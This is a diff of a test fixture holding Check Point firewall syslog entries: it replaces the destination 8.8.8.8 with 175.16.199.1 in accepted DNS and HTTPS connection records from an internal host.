-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57541"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36012"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39094"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45724"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50265"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59575"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50747"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43931"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38182"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41291"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36181"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40103"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57541"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36012"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39094"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44020"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39393"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39393"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d371,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"54.149.124.142"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42542"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d371,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51880"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33356"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
